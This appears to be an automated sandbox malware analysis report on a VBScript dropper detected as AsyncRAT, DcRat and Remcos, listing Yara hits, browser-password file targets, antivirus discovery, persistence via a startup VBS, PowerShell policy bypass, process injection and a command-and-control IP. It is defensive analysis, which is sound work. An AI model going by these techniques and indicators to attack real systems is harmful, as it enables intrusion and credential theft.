        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00404F51 GetLocalTime,CreateEventA,CreateThread,17_2_00404F51
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0041B60D GetComputerNameExW,GetUserNameW,17_2_0041B60D
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,17_2_00449190
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Yara detected AsyncRAT
        Source: Yara matchFile source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5144, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4148, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4068, type: MEMORYSTR
        Source: RegAsm.exe, 00000004.00000002.3316991933.0000000005474000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
        Source: wscript.exe, 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MSASCui.exe
        Source: wscript.exe, 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: procexp.exe
        Source: RegAsm.exe, 00000004.00000002.3318000698.000000000550E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3307841453.0000000001150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: wscript.exe, 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

        Stealing of Sensitive Information

        barindex
        Yara detected DcRat
        Source: Yara matchFile source: 00000004.00000002.3309788726.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4148, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4068, type: MEMORYSTR
        Yara detected Remcos RAT
        Source: Yara matchFile source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.2293840182.0000000002B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2306410441.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000002.2465197293.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2318995170.0000000003537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.2453487662.0000000003017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.3307138781.0000000002F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.2427511925.0000000002B17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.2441743999.00000000029F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: winhlp32.exe PID: 6540, type: MEMORYSTR
        Contains functionality to steal Chrome passwords or cookies
        Source: C:\Windows\winhlp32.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data17_2_0040BA12
        Source: C:\Windows\winhlp32.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data19_2_0040BA12
        Source: C:\Windows\winhlp32.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data21_2_0040BA12
        Source: C:\Windows\winhlp32.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data23_2_0040BA12
        Source: C:\Windows\winhlp32.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data27_2_0040BA12
        Contains functionality to steal Firefox passwords or cookies
        Source: C:\Windows\winhlp32.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\17_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: \key3.db17_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\19_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: \key3.db19_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\21_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: \key3.db21_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\23_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: \key3.db23_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\27_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: \key3.db27_2_0040BB30

        Remote Access Functionality

        barindex
        Yara detected DcRat
        Source: Yara matchFile source: 00000004.00000002.3309788726.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4148, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4068, type: MEMORYSTR
        Yara detected Remcos RAT
        Source: Yara matchFile source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.2293840182.0000000002B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2306410441.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000002.2465197293.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2318995170.0000000003537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.2453487662.0000000003017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.3307138781.0000000002F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.2427511925.0000000002B17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.2441743999.00000000029F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: winhlp32.exe PID: 6540, type: MEMORYSTR
        Source: C:\Windows\winhlp32.exeCode function: cmd.exe17_2_0040569A
        Source: C:\Windows\winhlp32.exeCode function: cmd.exe19_2_0040569A
        Source: C:\Windows\winhlp32.exeCode function: cmd.exe21_2_0040569A
        Source: C:\Windows\winhlp32.exeCode function: cmd.exe23_2_0040569A
        Source: C:\Windows\winhlp32.exeCode function: cmd.exe27_2_0040569A

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information621
        Scripting        		Valid Accounts2
        Windows Management Instrumentation        		621
        Scripting        		1
        DLL Side-Loading        		1
        Disable or Modify Tools        		1
        OS Credential Dumping        		2
        System Time Discovery        		Remote Services11
        Archive Collected Data        		12
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts11
        Native API        		1
        DLL Side-Loading        		1
        Bypass User Account Control        		1
        Deobfuscate/Decode Files or Information        		111
        Input Capture        		1
        Account Discovery        		Remote Desktop Protocol111
        Input Capture        		2
        Encrypted Channel        		Exfiltration Over Bluetooth1
        Defacement
        Email AddressesDNS ServerDomain Accounts1
        Exploitation for Client Execution        		1
        Windows Service        		1
        Access Token Manipulation        		131
        Obfuscated Files or Information        		2
        Credentials In Files        		1
        System Service Discovery        		SMB/Windows Admin Shares3
        Clipboard Data        		1
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts1
        Command and Scripting Interpreter        		1
        Scheduled Task/Job        		1
        Windows Service        		1
        DLL Side-Loading        		NTDS4
        File and Directory Discovery        		Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud Accounts1
        Scheduled Task/Job        		2
        Registry Run Keys / Startup Folder        		422
        Process Injection        		1
        Bypass User Account Control        		LSA Secrets44
        System Information Discovery        		SSHKeylogging12
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable Media2
        Service Execution        		RC Scripts1
        Scheduled Task/Job        		1
        Masquerading        		Cached Domain Credentials251
        Security Software Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote Services3
        PowerShell        		Startup Items2
        Registry Run Keys / Startup Folder        		1
        Modify Registry        		DCSync41
        Virtualization/Sandbox Evasion        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
        Virtualization/Sandbox Evasion        		Proc Filesystem3
        Process Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Access Token Manipulation        		/etc/passwd and /etc/shadow1
        Application Window Discovery        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron422
        Process Injection        		Network Sniffing1
        System Owner/User Discovery        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
        Regsvr32        		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431185 Sample: lmg1_Mlakaifa443456.vbs Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 68 geoplugin.net 2->68 70 bg.microsoft.map.fastly.net 2->70 98 Snort IDS alert for network traffic 2->98 100 Found malware configuration 2->100 102 Malicious sample detected (through community Yara rule) 2->102 104 19 other signatures 2->104 12 wscript.exe 1 2->12         started        15 wscript.exe 2->15         started        signatures3 process4 signatures5 118 VBScript performs obfuscated calls to suspicious functions 12->118 120 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->120 122 Suspicious execution chain found 12->122 17 wscript.exe 2 12->17         started        124 Wscript called in batch mode (surpress errors) 15->124 21 wscript.exe 15->21         started        process6 file7 64 C:\Users\user\AppData\Local\...\dynwrapx.dll, PE32 17->64 dropped 84 VBScript performs obfuscated calls to suspicious functions 17->84 86 Drops VBS files to the startup folder 17->86 88 Contains functionality to inject code into remote processes 17->88 96 3 other signatures 17->96 23 RegAsm.exe 2 4 17->23         started        27 RegAsm.exe 2 17->27         started        29 RegAsm.exe 3 17->29         started        37 5 other processes 17->37 90 Writes to foreign memory regions 21->90 92 Allocates memory in foreign processes 21->92 94 Injects a PE file into a foreign processes 21->94 31 regsvr32.exe 21->31         started        33 winhlp32.exe 21->33         started        35 regsvr32.exe 21->35         started        39 5 other processes 21->39 signatures8 process9 dnsIp10 74 139.99.133.66, 4444, 49704, 49706 OVHFR Canada 23->74 66 C:\Users\user\AppData\Local\Temp\remc1.vbs, Unicode 23->66 dropped 41 cmd.exe 23->41         started        file11 process12 signatures13 114 Suspicious powershell command line found 41->114 116 Bypasses PowerShell execution policy 41->116 44 powershell.exe 41->44         started        46 conhost.exe 41->46         started        process14 process15 48 wscript.exe 44->48         started        file16 62 C:\Users\user\AppData\Roaming\...\remc1.vbs, Unicode 48->62 dropped 76 Windows Shell Script Host drops VBS files 48->76 78 Writes to foreign memory regions 48->78 80 Allocates memory in foreign processes 48->80 82 2 other signatures 48->82 52 winhlp32.exe 48->52         started        56 regsvr32.exe 48->56         started        58 regsvr32.exe 48->58         started        60 5 other processes 48->60 signatures17 process18 dnsIp19 72 geoplugin.net 178.237.33.50, 49716, 80 ATOM86-ASATOM86NL Netherlands 52->72 106 Contains functionality to bypass UAC (CMSTPLUA) 52->106 108 Contains functionalty to change the wallpaper 52->108 110 Contains functionality to steal Chrome passwords or cookies 52->110 112 3 other signatures 52->112 signatures20

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        lmg1_Mlakaifa443456.vbs26%ReversingLabsScript-WScript.Backdoor.AsyncRAT
        lmg1_Mlakaifa443456.vbs100%AviraVBS/Drop.Agent.VPXR

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\dynwrapx.dll46%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://geoplugin.net/json.gp100%URL Reputationphishing
        139.99.133.660%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        bg.microsoft.map.fastly.net
        		199.232.210.172
        		truefalse
          		unknown
          geoplugin.net
          		178.237.33.50
          		truefalse
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://geoplugin.net/json.gptrue
            • URL Reputation: phishing
            		unknown
            139.99.133.66true
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000004.00000002.3309788726.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
              		high

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              178.237.33.50
              		geoplugin.netNetherlands
              		8455ATOM86-ASATOM86NLfalse
              139.99.133.66
              		unknownCanada
              		16276OVHFRtrue

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1431185
              Start date and time:2024-04-24 17:03:07 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 10m 53s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:35
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:lmg1_Mlakaifa443456.vbs
              Detection:MAL
              Classification:mal100.rans.troj.spyw.expl.evad.winVBS@61/10@1/2
              EGA Information:
              • Successful, ratio: 36.8%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 100
              • Number of non-executed functions: 357
              Cookbook Comments:
              • Found application associated with file extension: .vbs

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
              • Excluded IPs from analysis (whitelisted): 23.204.146.169, 23.204.146.147, 23.204.146.202
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
              • Execution Graph export aborted for target RegAsm.exe, PID 2964 because it is empty
              • Execution Graph export aborted for target RegAsm.exe, PID 3160 because it is empty
              • Execution Graph export aborted for target RegAsm.exe, PID 4068 because it is empty
              • Execution Graph export aborted for target regsvr32.exe, PID 1272 because there are no executed function
              • Execution Graph export aborted for target regsvr32.exe, PID 1788 because there are no executed function
              • Execution Graph export aborted for target regsvr32.exe, PID 3116 because there are no executed function
              • Execution Graph export aborted for target regsvr32.exe, PID 3128 because there are no executed function
              • Execution Graph export aborted for target regsvr32.exe, PID 3620 because there are no executed function
              • Execution Graph export aborted for target regsvr32.exe, PID 4436 because there are no executed function
              • Execution Graph export aborted for target regsvr32.exe, PID 5672 because there are no executed function
              • Execution Graph export aborted for target regsvr32.exe, PID 6460 because there are no executed function
              • Execution Graph export aborted for target regsvr32.exe, PID 6664 because there are no executed function
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtEnumerateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • VT rate limit hit for: lmg1_Mlakaifa443456.vbs

              Simulations

              Behavior and APIs

              TimeTypeDescription
              17:04:03API Interceptor1x Sleep call for process: RegAsm.exe modified
              17:04:15API Interceptor4x Sleep call for process: powershell.exe modified
              17:04:18AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs
              17:04:58API Interceptor840972x Sleep call for process: winhlp32.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              178.237.33.50UrgenteNotificationRef.cmdGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
              • geoplugin.net/json.gp
              URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
              • geoplugin.net/json.gp
              OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
              • geoplugin.net/json.gp
              fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
              • geoplugin.net/json.gp
              1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
              • geoplugin.net/json.gp
              TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              DHL Express Courier Pickup Confirmation CBJ231025122456.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              Quotation.xlsGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              bg.microsoft.map.fastly.nethttps://ken.fnh.temporary.site/wp-includes/sitemaps/updateGet hashmaliciousUnknownBrowse
              • 199.232.210.172
              https://8fq7c.eceydri.com/WK9D/Get hashmaliciousHTMLPhisherBrowse
              • 199.232.210.172
              http://womenofgoodworks-my.sharepoint.com/:b:/g/personal/tia_womenofgoodworks_org/EVICmRtg-CVNtsngkb8KQlgBH2LYVfumjH5s-SFbeQjN_QGet hashmaliciousHTMLPhisherBrowse
              • 199.232.214.172
              https://cloudacc.page.link/RtQwGet hashmaliciousHTMLPhisherBrowse
              • 199.232.210.172
              http://www.agilgas.com.br/wp-content/uploads/2024/04/tryythgghjhgfj.html#T0RQQ2pCOVhPSTJvNm12WEYvSGFNOUI2Q3J4bElveUFOazNibHR2QWI4SGp2aG4yU2kwVytiSzF6WjZnZXN5YUFpUTM5dmpINHlOM2JXdGVtdUM3c2UyMk1yVXROeVVDVVMzYUdOeHFWdDg9Get hashmaliciousPhisherBrowse
              • 199.232.214.172
              https://colmec.it/category/newsGet hashmaliciousUnknownBrowse
              • 199.232.214.172
              http://gnoticiasimparciais.comGet hashmaliciousUnknownBrowse
              • 199.232.210.172
              https://www.linkedin.com/redir/redirect?url=https%3A%2F%2Flookerstudio%2Egoogle%2Ecom%2Fs%2FscrHqwjeA3k&urlhash=dcQj&trk=public_profile-settings_topcard-websiteGet hashmaliciousUnknownBrowse
              • 199.232.214.172
              http://p.ksrndkehqnwntyxlhgto.comGet hashmaliciousUnknownBrowse
              • 199.232.210.172
              https://colmec.it/category/newsGet hashmaliciousUnknownBrowse
              • 199.232.214.172
              geoplugin.netUrgenteNotificationRef.cmdGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
              • 178.237.33.50
              URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
              • 178.237.33.50
              OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
              • 178.237.33.50
              fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
              • 178.237.33.50
              1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
              • 178.237.33.50
              HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
              • 178.237.33.50
